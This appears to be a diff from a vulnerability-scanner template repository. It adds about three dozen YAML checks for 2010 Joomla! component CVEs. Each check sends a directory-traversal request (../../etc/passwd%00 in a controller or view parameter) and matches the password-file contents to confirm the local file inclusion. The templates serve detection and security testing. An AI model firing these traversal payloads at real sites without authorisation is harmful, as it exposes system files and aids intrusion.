severity: high
description: Directory traversal vulnerability in plugins/system/cdscriptegrator/libraries/highslide/js/jsloader.php in the Core Design Scriptegrator plugin 1.4.1 for Joomla! allows remote attackers to read, and possibly include and execute, arbitrary files via directory traversal sequences in the files[] parameter.
reference:
- https://www.exploit-db.com/exploits/11498
- https://www.cvedetails.com/cve/CVE-2010-0759
tags: cve,cve2010,joomla,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/plugins/system/cdscriptegrator/libraries/highslide/js/jsloader.php?files[]=/etc/passwd"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200

27
cves/2010/CVE-2010-0942.yaml Normal file
View File

@ -0,0 +1,27 @@
id: CVE-2010-0942
info:
name: Joomla! Component com_jvideodirect - Directory Traversal
author: daffainfo
severity: high
description: Directory traversal vulnerability in the jVideoDirect (com_jvideodirect) component for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.
reference:
- https://www.exploit-db.com/exploits/11089
- https://www.cvedetails.com/cve/CVE-2010-0942
tags: cve,cve2010,joomla,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/index.php?option=com_jvideodirect&controller=../../../../../../../../../../etc/passwd%00"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200

27
cves/2010/CVE-2010-0943.yaml Normal file
View File

@ -0,0 +1,27 @@
id: CVE-2010-0943
info:
name: Joomla! Component com_jashowcase - Directory Traversal
author: daffainfo
severity: high
description: Directory traversal vulnerability in the JA Showcase (com_jashowcase) component for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter in a jashowcase action to index.php.
reference:
- https://www.exploit-db.com/exploits/11090
- https://www.cvedetails.com/cve/CVE-2010-0943
tags: cve,cve2010,joomla,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/index.php?option=com_jashowcase&view=jashowcase&controller=../../../../../../../etc/passwd%00"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200

27
cves/2010/CVE-2010-0944.yaml Normal file
View File

@ -0,0 +1,27 @@
id: CVE-2010-0944
info:
name: Joomla! Component com_jcollection - Directory Traversal
author: daffainfo
severity: high
description: Directory traversal vulnerability in the JCollection (com_jcollection) component for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.
reference:
- https://www.exploit-db.com/exploits/11088
- https://www.cvedetails.com/cve/CVE-2010-0944
tags: cve,cve2010,joomla,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/index.php?option=com_jcollection&controller=../../../../../../../etc/passwd%00"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200

27
cves/2010/CVE-2010-0972.yaml Normal file
View File

@ -0,0 +1,27 @@
id: CVE-2010-0972
info:
name: Joomla! Component com_gcalendar Suite 2.1.5 - Local File Inclusion
author: daffainfo
severity: high
description: Directory traversal vulnerability in the GCalendar (com_gcalendar) component 2.1.5 for Joomla! allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the controller parameter to index.php.
reference:
- https://www.exploit-db.com/exploits/11738
- https://www.cvedetails.com/cve/CVE-2010-0972
tags: cve,cve2010,joomla,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/index.php?option=com_gcalendar&controller=../../../../../etc/passwd%00"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200

27
cves/2010/CVE-2010-0982.yaml Normal file
View File

@ -0,0 +1,27 @@
id: CVE-2010-0982
info:
name: Joomla! Component com_cartweberp - Local File Inclusion
author: daffainfo
severity: high
description: Directory traversal vulnerability in the CARTwebERP (com_cartweberp) component 1.56.75 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.
reference:
- https://www.exploit-db.com/exploits/10942
- https://www.cvedetails.com/cve/CVE-2010-0982
tags: cve,cve2010,joomla,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/index.php?option=com_cartweberp&controller=../../../../../../../../etc/passwd"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200

27
cves/2010/CVE-2010-0985.yaml Normal file
View File

@ -0,0 +1,27 @@
id: CVE-2010-0985
info:
name: Joomla! Component com_abbrev - Local File Inclusion
author: daffainfo
severity: high
description: Directory traversal vulnerability in the Abbreviations Manager (com_abbrev) component 1.1 for Joomla! allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the controller parameter to index.php.
reference:
- https://www.exploit-db.com/exploits/10948
- https://www.cvedetails.com/cve/CVE-2010-0985
tags: cve,cve2010,joomla,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/index.php?option=com_abbrev&controller=../../../../../../../../../../etc/passwd%00"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200

27
cves/2010/CVE-2010-1056.yaml Normal file
View File

@ -0,0 +1,27 @@
id: CVE-2010-1056
info:
name: Joomla! Component com_rokdownloads - Local File Inclusion
author: daffainfo
severity: high
description: Directory traversal vulnerability in the RokDownloads (com_rokdownloads) component before 1.0.1 for Joomla! allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the controller parameter to index.php.
reference:
- https://www.exploit-db.com/exploits/11760
- https://www.cvedetails.com/cve/CVE-2010-1056
tags: cve,cve2010,joomla,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/index.php?option=com_rokdownloads&controller=../../../../../../../../../../etc/passwd%00"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200

27
cves/2010/CVE-2010-1081.yaml Normal file
View File

@ -0,0 +1,27 @@
id: CVE-2010-1081
info:
name: Joomla! Component com_communitypolls 1.5.2 - Local File Inclusion
author: daffainfo
severity: high
description: Directory traversal vulnerability in the Community Polls (com_communitypolls) component 1.5.2, and possibly earlier, for Core Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.
reference:
- https://www.exploit-db.com/exploits/11511
- https://www.cvedetails.com/cve/CVE-2010-1081
tags: cve,cve2010,joomla,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/index.php?option=com_communitypolls&controller=../../../../../../../../../../../../../../../etc/passwd%00"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200

27
cves/2010/CVE-2010-1217.yaml Normal file
View File

@ -0,0 +1,27 @@
id: CVE-2010-1217
info:
name: Joomla! Component & Plugin JE Tooltip 1.0 - Local File Inclusion
author: daffainfo
severity: high
description: Directory traversal vulnerability in the JE Form Creator (com_jeformcr) component for Joomla!, when magic_quotes_gpc is disabled, allows remote attackers to read arbitrary files via directory traversal sequences in the view parameter to index.php. NOTE the original researcher states that the affected product is JE Tooltip, not Form Creator; however, the exploit URL suggests that Form Creator is affected.
reference:
- https://www.exploit-db.com/exploits/11814
- https://www.cvedetails.com/cve/CVE-2010-1217
tags: cve,cve2010,joomla,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/index.php?option=com_jeformcr&view=../../../../../../../../etc/passwd%00"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200

26
cves/2010/CVE-2010-1219.yaml Normal file
View File

@ -0,0 +1,26 @@
id: CVE-2010-1219
info:
name: Joomla! Component com_janews - Local File Inclusion
author: daffainfo
severity: high
description: Directory traversal vulnerability in the JA News (com_janews) component 1.0 for Joomla! allows remote attackers to read arbitrary local files via a .. (dot dot) in the controller parameter to index.php.
reference:
- https://www.exploit-db.com/exploits/11757
- https://www.cvedetails.com/cve/CVE-2010-1219
tags: cve,cve2010,joomla,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/index.php?option=com_janews&controller=../../../../../../../../../../etc/passwd%00"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200

27
cves/2010/CVE-2010-1302.yaml Normal file
View File

@ -0,0 +1,27 @@
id: CVE-2010-1302
info:
name: Joomla! Component DW Graph - Local File Inclusion
author: daffainfo
severity: high
description: Directory traversal vulnerability in dwgraphs.php in the DecryptWeb DW Graphs (com_dwgraphs) component 1.0 for Joomla! allows remote attackers to read arbitrary files via directory traversal sequences in the controller parameter to index.php.
reference:
- https://www.exploit-db.com/exploits/11978
- https://www.cvedetails.com/cve/CVE-2010-1302
tags: cve,cve2010,joomla,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/index.php?option=com_dwgraphs&controller=../../../../../../../../etc/passwd%00"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200

27
cves/2010/CVE-2010-1304.yaml Normal file
View File

@ -0,0 +1,27 @@
id: CVE-2010-1304
info:
name: Joomla! Component User Status - Local File Inclusion
author: daffainfo
severity: high
description: Directory traversal vulnerability in userstatus.php in the User Status (com_userstatus) component 1.21.16 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.
reference:
- https://www.exploit-db.com/exploits/11998
- https://www.cvedetails.com/cve/CVE-2010-1304
tags: cve,cve2010,joomla,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/index.php?option=com_userstatus&controller=../../../../../../../../../../etc/passwd%00"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200

27
cves/2010/CVE-2010-1305.yaml Normal file
View File

@ -0,0 +1,27 @@
id: CVE-2010-1305
info:
name: Joomla! Component JInventory 1.23.02 - Local File Inclusion
author: daffainfo
severity: high
description: Directory traversal vulnerability in jinventory.php in the JInventory (com_jinventory) component 1.23.02 and possibly other versions before 1.26.03, a module for Joomla!, allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.
reference:
- https://www.exploit-db.com/exploits/12065
- https://www.cvedetails.com/cve/CVE-2010-1305
tags: cve,cve2010,joomla,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/index.php?option=com_jinventory&controller=../../../../../../../../../../etc/passwd%00"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200

27
cves/2010/CVE-2010-1306.yaml Normal file
View File

@ -0,0 +1,27 @@
id: CVE-2010-1306
info:
name: Joomla! Component Picasa 2.0 - Local File Inclusion
author: daffainfo
severity: high
description: Directory traversal vulnerability in the Picasa (com_joomlapicasa2) component 2.0 and 2.0.5 for Joomla! allows remote attackers to read arbitrary local files via a .. (dot dot) in the controller parameter to index.php.
reference:
- https://www.exploit-db.com/exploits/12058
- https://www.cvedetails.com/cve/CVE-2010-1306
tags: cve,cve2010,joomla,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/index.php?option=com_joomlapicasa2&controller=../../../../../etc/passwd%00"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200

27
cves/2010/CVE-2010-1307.yaml Normal file
View File

@ -0,0 +1,27 @@
id: CVE-2010-1307
info:
name: Joomla! Component Magic Updater - Local File Inclusion
author: daffainfo
severity: high
description: Directory traversal vulnerability in the Magic Updater (com_joomlaupdater) component for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.
reference:
- https://www.exploit-db.com/exploits/12070
- https://www.cvedetails.com/cve/CVE-2010-1307
tags: cve,cve2010,joomla,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/index.php?option=com_joomlaupdater&controller=../../../../../../../etc/passwd%00"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200

27
cves/2010/CVE-2010-1308.yaml Normal file
View File

@ -0,0 +1,27 @@
id: CVE-2010-1308
info:
name: Joomla! Component SVMap 1.1.1 - Local File Inclusion
author: daffainfo
severity: high
description: Directory traversal vulnerability in the SVMap (com_svmap) component 1.1.1 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.
reference:
- https://www.exploit-db.com/exploits/12066
- https://www.cvedetails.com/cve/CVE-2010-1308
tags: cve,cve2010,joomla,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/index.php?option=com_svmap&controller=../../../../../../../etc/passwd%00"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200

27
cves/2010/CVE-2010-1312.yaml Normal file
View File

@ -0,0 +1,27 @@
id: CVE-2010-1312
info:
name: Joomla! Component News Portal 1.5.x - Local File Inclusion
author: daffainfo
severity: high
description: Directory traversal vulnerability in the iJoomla News Portal (com_news_portal) component 1.5.x for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.
reference:
- https://www.exploit-db.com/exploits/12077
- https://www.cvedetails.com/cve/CVE-2010-1312
tags: cve,cve2010,joomla,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/index.php?option=com_news_portal&controller=../../../../../../../../../../etc/passwd%00"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200

27
cves/2010/CVE-2010-1313.yaml Normal file
View File

@ -0,0 +1,27 @@
id: CVE-2010-1313
info:
name: Joomla! Component Saber Cart 1.0.0.12 - Local File Inclusion
author: daffainfo
severity: high
description: Directory traversal vulnerability in the Seber Cart (com_sebercart) component 1.0.0.12 and 1.0.0.13 for Joomla!, when magic_quotes_gpc is disabled, allows remote attackers to read arbitrary files via a .. (dot dot) in the view parameter to index.php.
reference:
- https://www.exploit-db.com/exploits/12082
- https://www.cvedetails.com/cve/CVE-2010-1313
tags: cve,cve2010,joomla,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/index.php?option=com_sebercart&view=../../../../../../../../../../etc/passwd%00"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200

27
cves/2010/CVE-2010-1314.yaml Normal file
View File

@ -0,0 +1,27 @@
id: CVE-2010-1314
info:
name: Joomla! Component Highslide 1.5 - Local File Inclusion
author: daffainfo
severity: high
description: Directory traversal vulnerability in the Highslide JS (com_hsconfig) component 1.5 and 2.0.9 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.
reference:
- https://www.exploit-db.com/exploits/12086
- https://www.cvedetails.com/cve/CVE-2010-1314
tags: cve,cve2010,joomla,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/index.php?option=com_hsconfig&controller=../../../../../../../../../../etc/passwd%00"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200

27
cves/2010/CVE-2010-1315.yaml Normal file
View File

@ -0,0 +1,27 @@
id: CVE-2010-1315
info:
name: Joomla! Component webERPcustomer - Local File Inclusion
author: daffainfo
severity: high
description: Directory traversal vulnerability in weberpcustomer.php in the webERPcustomer (com_weberpcustomer) component 1.2.1 and 1.x before 1.06.02 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.
reference:
- https://www.exploit-db.com/exploits/11999
- https://www.cvedetails.com/cve/CVE-2010-1315
tags: cve,cve2010,joomla,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/index.php?option=com_weberpcustomer&controller=../../../../../../../../../../etc/passwd%00"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200

27
cves/2010/CVE-2010-1340.yaml Normal file
View File

@ -0,0 +1,27 @@
id: CVE-2010-1340
info:
name: Joomla! Component com_jresearch - 'Controller' Local File Inclusion
author: daffainfo
severity: high
description: Directory traversal vulnerability in jresearch.php in the J!Research (com_jresearch) component for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.
reference:
- https://www.exploit-db.com/exploits/33797
- https://www.cvedetails.com/cve/CVE-2010-1340
tags: cve,cve2010,joomla,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/index.php?option=com_jresearch&controller=../../../../../../../../etc/passwd%00"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200

27
cves/2010/CVE-2010-1345.yaml Normal file
View File

@ -0,0 +1,27 @@
id: CVE-2010-1345
info:
name: Joomla! Component Cookex Agency CKForms - Local File Inclusion
author: daffainfo
severity: high
description: Directory traversal vulnerability in the Cookex Agency CKForms (com_ckforms) component 1.3.3 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.
reference:
- https://www.exploit-db.com/exploits/15453
- https://www.cvedetails.com/cve/CVE-2010-1345
tags: cve,cve2010,joomla,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/index.php?option=com_ckforms&controller=../../../../../../../../../../etc/passwd%00"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200

27
cves/2010/CVE-2010-1352.yaml Normal file
View File

@ -0,0 +1,27 @@
id: CVE-2010-1352
info:
name: Joomla! Component Juke Box 1.7 - Local File Inclusion
author: daffainfo
severity: high
description: Directory traversal vulnerability in the JOOFORGE Jutebox (com_jukebox) component 1.0 and 1.7 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.
reference:
- https://www.exploit-db.com/exploits/12084
- https://www.cvedetails.com/cve/CVE-2010-1352
tags: cve,cve2010,joomla,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/index.php?option=com_jukebox&controller=../../../../../../../../../../etc/passwd%00"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200

27
cves/2010/CVE-2010-1353.yaml Normal file
View File

@ -0,0 +1,27 @@
id: CVE-2010-1353
info:
name: Joomla! Component LoginBox - Local File Inclusion
author: daffainfo
severity: high
description: Directory traversal vulnerability in the LoginBox Pro (com_loginbox) component for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the view parameter to index.php.
reference:
- https://www.exploit-db.com/exploits/12068
- https://www.cvedetails.com/cve/CVE-2010-1353
tags: cve,cve2010,joomla,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/index.php?option=com_loginbox&view=../../../../../../../../../etc/passwd%00"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200

27
cves/2010/CVE-2010-1354.yaml Normal file
View File

@ -0,0 +1,27 @@
id: CVE-2010-1354
info:
name: Joomla! Component VJDEO 1.0 - Local File Inclusion
author: daffainfo
severity: high
description: Directory traversal vulnerability in the VJDEO (com_vjdeo) component 1.0 and 1.0.1 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.
reference:
- https://www.exploit-db.com/exploits/12102
- https://www.cvedetails.com/cve/CVE-2010-1354
tags: cve,cve2010,joomla,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/index.php?option=com_vjdeo&controller=../../../../../../../../../../../../../../../etc/passwd%00"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200

27
cves/2010/CVE-2010-1461.yaml Normal file
View File

@ -0,0 +1,27 @@
id: CVE-2010-1461
info:
name: Joomla! Component Photo Battle 1.0.1 - Local File Inclusion
author: daffainfo
severity: high
description: Directory traversal vulnerability in the Photo Battle (com_photobattle) component 1.0.1 for Joomla! allows remote attackers to read arbitrary files via the view parameter to index.php.
reference: |
- https://www.exploit-db.com/exploits/12232
- https://www.cvedetails.com/cve/CVE-2010-1461
tags: cve,cve2010,joomla,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/index.php?option=com_photobattle&view=../../../../../../../../../../etc/passwd%00"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200

27
cves/2010/CVE-2010-1469.yaml Normal file
View File

@ -0,0 +1,27 @@
id: CVE-2010-1469
info:
name: Joomla! Component JProject Manager 1.0 - Local File Inclusion
author: daffainfo
severity: high
description: Directory traversal vulnerability in the Ternaria Informatica JProject Manager (com_jprojectmanager) component 1.0 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impact via a .. (dot dot) in the controller parameter to index.php.
reference: |
- https://www.exploit-db.com/exploits/12146
- https://www.cvedetails.com/cve/CVE-2010-1469
tags: cve,cve2010,joomla,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/index.php?option=com_jprojectmanager&controller=../../../../../../../../../../etc/passwd%00"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200

27
cves/2010/CVE-2010-1470.yaml Normal file
View File

@ -0,0 +1,27 @@
id: CVE-2010-1470
info:
name: Joomla! Component Web TV 1.0 - Local File Inclusion
author: daffainfo
severity: high
description: Directory traversal vulnerability in the Web TV (com_webtv) component 1.0 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impact via a .. (dot dot) in the controller parameter to index.php.
reference:
- https://www.exploit-db.com/exploits/12166
- https://www.cvedetails.com/cve/CVE-2010-1470
tags: cve,cve2010,joomla,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/index.php?option=com_webtv&controller=../../../../../../../../../../etc/passwd%00"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200

27
cves/2010/CVE-2010-1471.yaml Normal file
View File

@ -0,0 +1,27 @@
id: CVE-2010-1471
info:
name: Joomla! Component Address Book 1.5.0 - Local File Inclusion
author: daffainfo
severity: high
description: Directory traversal vulnerability in the AddressBook (com_addressbook) component 1.5.0 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.
reference:
- https://www.exploit-db.com/exploits/12170
- https://www.cvedetails.com/cve/CVE-2010-1471
tags: cve,cve2010,joomla,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/index.php?option=com_addressbook&controller=../../../../../../../../../../etc/passwd%00"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200

27
cves/2010/CVE-2010-1472.yaml Normal file
View File

@ -0,0 +1,27 @@
id: CVE-2010-1472
info:
name: Joomla! Component Horoscope 1.5.0 - Local File Inclusion
author: daffainfo
severity: high
description: Directory traversal vulnerability in the Daily Horoscope (com_horoscope) component 1.5.0 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.
reference:
- https://www.exploit-db.com/exploits/12167
- https://www.cvedetails.com/cve/CVE-2010-1472
tags: cve,cve2010,joomla,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/index.php?option=com_horoscope&controller=../../../../../../../../../../etc/passwd%00"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200

27
cves/2010/CVE-2010-1473.yaml Normal file
View File

@ -0,0 +1,27 @@
id: CVE-2010-1473
info:
name: Joomla! Component Advertising 0.25 - Local File Inclusion
author: daffainfo
severity: high
description: Directory traversal vulnerability in the Advertising (com_advertising) component 0.25 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impact via a .. (dot dot) in the controller parameter to index.php.
reference:
- https://www.exploit-db.com/exploits/12171
- https://www.cvedetails.com/cve/CVE-2010-1473
tags: cve,cve2010,joomla,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/index.php?option=com_advertising&controller=../../../../../../../../../../etc/passwd%00"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200

27
cves/2010/CVE-2010-1474.yaml Normal file
View File

@ -0,0 +1,27 @@
id: CVE-2010-1474
info:
name: Joomla! Component Sweetykeeper 1.5 - Local File Inclusion
author: daffainfo
severity: high
description: Directory traversal vulnerability in the Sweety Keeper (com_sweetykeeper) component 1.5.x for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impact via a .. (dot dot) in the controller parameter to index.php.
reference:
- https://www.exploit-db.com/exploits/12182
- https://www.cvedetails.com/cve/CVE-2010-1474
tags: cve,cve2010,joomla,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/index.php?option=com_sweetykeeper&controller=../../../../../../../../../../etc/passwd%00"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200

27
cves/2010/CVE-2010-1475.yaml Normal file
View File

@ -0,0 +1,27 @@
id: CVE-2010-1475
info:
name: Joomla! Component Preventive And Reservation 1.0.5 - Local File Inclusion
author: daffainfo
severity: high
description: Directory traversal vulnerability in the Preventive & Reservation (com_preventive) component 1.0.5 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impact via a .. (dot dot) in the controller parameter to index.php.
reference:
- https://www.exploit-db.com/exploits/12147
- https://www.cvedetails.com/cve/CVE-2010-1475
tags: cve,cve2010,joomla,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/index.php?option=com_preventive&controller==../../../../../../../../../../etc/passwd%00"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200

27
cves/2010/CVE-2010-1476.yaml Normal file
View File

@ -0,0 +1,27 @@
id: CVE-2010-1476
info:
name: Joomla! Component AlphaUserPoints 1.5.5 - Local File Inclusion
author: daffainfo
severity: high
description: Directory traversal vulnerability in the AlphaUserPoints (com_alphauserpoints) component 1.5.5 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impact via a .. (dot dot) in the view parameter to index.php.
reference:
- https://www.exploit-db.com/exploits/12150
- https://www.cvedetails.com/cve/CVE-2010-1476
tags: cve,cve2010,joomla,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/index.php?option=com_alphauserpoints&view=../../../../../../../../../../etc/passwd%00"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200

Some files were not shown because too many files have changed in this diff Show More